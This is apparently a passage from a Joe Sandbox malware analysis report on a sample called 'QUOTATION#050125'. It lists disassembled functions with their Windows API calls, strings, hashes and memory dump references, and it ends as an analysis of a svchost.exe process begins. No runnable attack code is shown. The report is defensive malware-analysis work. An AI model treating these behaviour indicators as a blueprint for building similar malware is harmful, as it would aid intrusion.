Instruction Fuzzy Hash: 7931BC71100204AEEB20DF28DC90EFB7BA9FF88724F00861DF9A597280DB35AD91D764

Function 00514537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0051461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00514634

Strings

', xrefs: 0051458E

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 4921e208509e306dabc6ae1a1cb0dd9cc3e30e1a682cb46889beacd183ff833e
Instruction ID: 5e4671467259bd4ba7acbae2ece438e536cc1d290900f0a88a409f9947529d5d
Opcode Fuzzy Hash: 4921e208509e306dabc6ae1a1cb0dd9cc3e30e1a682cb46889beacd183ff833e
Instruction Fuzzy Hash: 86313874A0030A9FEB14CFA9C990BEA7BB6FF09304F15506AE905AB341D770A981DF90

Function 0050304E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0050335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00503077,?,?), ref: 00503378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0050307A
htons.WSOCK32(00000000,?,?,00000000), ref: 00503106

Strings

255.255.255.255, xrefs: 00503095, 0050309A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: a834cbd23932751d7ebac3841b4717f4a2ba80614d4d47728b5fb4521da028c2
Instruction ID: de9ce14454e6384abe76c546b8913cbd38f9367353d400a1bc76d4fa66580f31
Opcode Fuzzy Hash: a834cbd23932751d7ebac3841b4717f4a2ba80614d4d47728b5fb4521da028c2
Instruction Fuzzy Hash: F031C4396002059FC710DF29C495EAE7BE8FF54318F288459E8158B3E2D772DE45C760

Function 005131EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0051327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00513287

Strings

Combobox, xrefs: 00513249

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 672379611865d51bb71658c99614e50729c91e480cb0b723694b44e6a922e3ec
Instruction ID: b2457473a3f8124246d4034e20ba7d346bd6a451af41781798e585fb0514cf8a
Opcode Fuzzy Hash: 672379611865d51bb71658c99614e50729c91e480cb0b723694b44e6a922e3ec
Instruction Fuzzy Hash: 401190753002087FFF21AE54DC94EFB3F6AFB98364F104529F9289B290D6319D919760

Function 00513710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0048600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0048604C
Part of subcall function 0048600E: GetStockObject.GDI32(00000011), ref: 00486060
Part of subcall function 0048600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0048606A

GetWindowRect.USER32(00000000,?), ref: 0051377A
GetSysColor.USER32(00000012), ref: 00513794

Strings

static, xrefs: 00513757

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 0739b99fc9da2e1bdb51df9278ba80b7a51ba696871dd3f065b4dd3157ad3e56
Instruction ID: 100630511ab025179282d114090d62e0fe208d2612be4033b8088737716b13ea
Opcode Fuzzy Hash: 0739b99fc9da2e1bdb51df9278ba80b7a51ba696871dd3f065b4dd3157ad3e56
Instruction Fuzzy Hash: 191167B261020AAFEF01EFA8CC46EFA7BB8FB08314F004914F955E2250E735E951DB60

Function 004FCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004FCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004FCDA6

Strings

<local>, xrefs: 004FCD66

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 241dccacea4acb27a59cc305763d69171c29137e3933882c82817e9642856860
Instruction ID: 2c4dba3cd0c42cd6d1fa8aec2c713ec940b00f9e3f5777bb865178eb637767a4
Opcode Fuzzy Hash: 241dccacea4acb27a59cc305763d69171c29137e3933882c82817e9642856860
Instruction Fuzzy Hash: A611067124163DBAD7344B668C84FFBBEACEF127A4F00422BB20983180D3789845D6F5

Function 00513429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 005134AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005134BA

Strings

edit, xrefs: 0051348F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 8f11c4bb82f72c1b36c4360ccaa67a695f34a90d3eda30f6ee7e66d6833ed645
Instruction ID: 37c394cc9f9a21eae66e14b104e583bb9f1d69b8296a17998b937364fa3a34e9
Opcode Fuzzy Hash: 8f11c4bb82f72c1b36c4360ccaa67a695f34a90d3eda30f6ee7e66d6833ed645
Instruction Fuzzy Hash: A3119D71100208AAFF219E64DC58AEA3F6AFB15378F504724F961971D0C7B1DC919754

Function 004E1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004E3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004E1D4C

Strings

ComboBox, xrefs: 004E1CEB
ListBox, xrefs: 004E1D16

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 4d44531964809f190d03dabd2af0135dfa6f8f3e9a36c0678e4b5d1b5e60ae06
Instruction ID: 5cec77bb27a192df45a00f80f95d54cac3000de850c4352727e9485fc99afb79
Opcode Fuzzy Hash: 4d44531964809f190d03dabd2af0135dfa6f8f3e9a36c0678e4b5d1b5e60ae06
Instruction Fuzzy Hash: D701F531641218ABCB08FBA6CC15CFE7768FB02355B140A0FB862673D1EA3969088764

Function 004E1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004E3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 004E1C46

Strings

ComboBox, xrefs: 004E1BE5
ListBox, xrefs: 004E1C10

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 6384d714ca31d650cc60b7295672e900de5126c3e8644d5620d7109a77b2f430
Instruction ID: b7b23f54abad3e123a438fcb0c6358a8da70128620298e7a55a4d7089f2699e1
Opcode Fuzzy Hash: 6384d714ca31d650cc60b7295672e900de5126c3e8644d5620d7109a77b2f430
Instruction Fuzzy Hash: BF01F771BC11446BCB04FB92C9559FF77A89B11345F24041FB407B7292EA399E0897B9

Function 004E1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004E3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 004E1CC8

Strings

ComboBox, xrefs: 004E1C69
ListBox, xrefs: 004E1C94

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 7d9ddda700b2392190af31417bc6d1fedab4b267f3074fc19406f0cca870f8af
Instruction ID: 55e36844d4070200c66b3979f45b773f97b96f173e45136e8bdeccdc04969c1d
Opcode Fuzzy Hash: 7d9ddda700b2392190af31417bc6d1fedab4b267f3074fc19406f0cca870f8af
Instruction Fuzzy Hash: F401DB716C115467CB05FB96CA05AFF77A89B11345F24041BB802B7291FA399F08D779

Function 004E1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004E3CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 004E1DD3

Strings

ComboBox, xrefs: 004E1D75
ListBox, xrefs: 004E1DA0

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 1f26928b5518f325b8102ff2d46a53115a9bc453c47709c0ee5cdbd5623e95a6
Instruction ID: defb8c0e685e6779c0ca2497d934e6775d837b56c2ba739435a6fffb3bae849d
Opcode Fuzzy Hash: 1f26928b5518f325b8102ff2d46a53115a9bc453c47709c0ee5cdbd5623e95a6
Instruction Fuzzy Hash: 15F0F971A8161467C704F7A6CC55EFF7768AB01345F080D1BB462672D1EA7969088368

Function 00518172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00553018,0055305C), ref: 005181BF
CloseHandle.KERNEL32 ref: 005181D1

Strings

\0U, xrefs: 0051818A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0U
API String ID: 3712363035-1587584334
Opcode ID: 2195c51101ec92aecee27fcc0f1e336463f2b1ac11a230ea7950d221d051e69b
Instruction ID: 6ff55572ef8f561e0c63de409de27540ee9ff3a4bf253514f41307b6aa22151b
Opcode Fuzzy Hash: 2195c51101ec92aecee27fcc0f1e336463f2b1ac11a230ea7950d221d051e69b
Instruction Fuzzy Hash: A1F054B1640300BAE7206765AC59FB73E5CEB25796F004425BF0CD51F1D67A8A18A3B8

Function 004E0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004E0B23

Strings

AutoIt, xrefs: 004E0B17
Error allocating memory., xrefs: 004E0B1C

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 788147ba1989dc0fc301d6f4087724b79b12c39a7f4df30730ff2165afaa1ee0
Instruction ID: 74f505f278e3fc557ce9c273e366f72b4538cec5166147528dc99e2a8130de2b
Opcode Fuzzy Hash: 788147ba1989dc0fc301d6f4087724b79b12c39a7f4df30730ff2165afaa1ee0
Instruction Fuzzy Hash: 78E0D8312843082BD61037967C03FCD7E849F06F19F10042FF758955C38AD6689446ED

Function 004A0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0049F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004A0D71,?,?,?,0048100A), ref: 0049F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0048100A), ref: 004A0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0048100A), ref: 004A0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004A0D7F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 0af188f73a24ef1d016cc0dc3590827728bf1790612bb5e36fc22467ad0a9c28
Instruction ID: 6a9c4f5920dc4c7890e79f3c00d285d89cb659e41a68cffb2123711a7b878356
Opcode Fuzzy Hash: 0af188f73a24ef1d016cc0dc3590827728bf1790612bb5e36fc22467ad0a9c28
Instruction Fuzzy Hash: E6E06D742007018BE370AFB9E4087867FE4BB21744F008E6EE496C6651DBB9E4888B95

Function 004F3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 004F302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 004F3044

Strings

aut, xrefs: 004F3038

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 0227cd147b2f0e9efa9f91cc97d5c1ff70c3316ac810973e75d8eb37fe475340
Instruction ID: 598dbdd1fe1073560f9d18dec31bcb336c4ad417c14ee0c0fa9da2c7e25654b0
Opcode Fuzzy Hash: 0227cd147b2f0e9efa9f91cc97d5c1ff70c3316ac810973e75d8eb37fe475340
Instruction Fuzzy Hash: F6D05EB6540328A7DA20A7A5AC0EFCB3E6CDB05750F0002A1B6A5E2091DAF19988CAD0

Function 004DD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004DD220

Strings

X64, xrefs: 004DD2A8
%.3d, xrefs: 004DD22B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 4856940ec3903cc721d73463a05d43bb67080a0742f2e817aa8f9b6438896bad
Instruction ID: 1250385b812be5d385c1afad814ca93d4aee18e0a270c7e5753a96c4eac09e3b
Opcode Fuzzy Hash: 4856940ec3903cc721d73463a05d43bb67080a0742f2e817aa8f9b6438896bad
Instruction Fuzzy Hash: 37D0ECA1C48108EACF509AD098558F9B77CAB18341F5084A3F80691140D62CD50AA66A

Function 00512356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0051236C
PostMessageW.USER32(00000000), ref: 00512373

Part of subcall function 004EE97B: Sleep.KERNEL32 ref: 004EE9F3

Strings

Shell_TrayWnd, xrefs: 00512365

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 836725a25d6e8d5fce3d662e48915a8dcbaf6449519f6afa60d621abeedb94ce
Instruction ID: e5389f677ee828e5346c05de513b3d9f2d771917480ae1ba059d0fb755c2b5c0
Opcode Fuzzy Hash: 836725a25d6e8d5fce3d662e48915a8dcbaf6449519f6afa60d621abeedb94ce
Instruction Fuzzy Hash: EFD0A9323C03007AE264A372DC0FFC6AA04AB11B04F0089067201AA0D0C8A0A844CA08

Function 00512322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0051232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0051233F

Part of subcall function 004EE97B: Sleep.KERNEL32 ref: 004EE9F3

Strings

Shell_TrayWnd, xrefs: 00512325

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a442696fe7e7024a5d13bb47ba2c01d7ff860a78afaff21c9b1178d0be4e9a33
Instruction ID: 8f1be3a853a180458e8a281987405f07cf1970495924a626e383c746c2c8bea7
Opcode Fuzzy Hash: a442696fe7e7024a5d13bb47ba2c01d7ff860a78afaff21c9b1178d0be4e9a33
Instruction Fuzzy Hash: 47D0A9323C0300BAE264A372DC0FFC6AE04AB10B04F0089067205AA0D0C8A0A844CA04

Function 004BBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 004BBE93
GetLastError.KERNEL32 ref: 004BBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004BBEFC

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b9dc747e5593a22a885508d8b743a9dc7380d2d9ba05b5cdea5d5632a306ba74
Instruction ID: b680b01aa4db79bb30693ad9b6b6248606b655bbd07081f630db89deb9636a84
Opcode Fuzzy Hash: b9dc747e5593a22a885508d8b743a9dc7380d2d9ba05b5cdea5d5632a306ba74
Instruction Fuzzy Hash: 6941D435600206AFCF218FA5CC44AFB7BA5EF42310F14816BF959972A1DBB58D01DBB9

Analysis Process: svchost.exePID: 7456, Parent PID: 6920COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5.9%
Signature Coverage:	9.2%
Total number of Nodes:	153
Total number of Limit Nodes:	13

Executed Functions

Function 00417AD3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

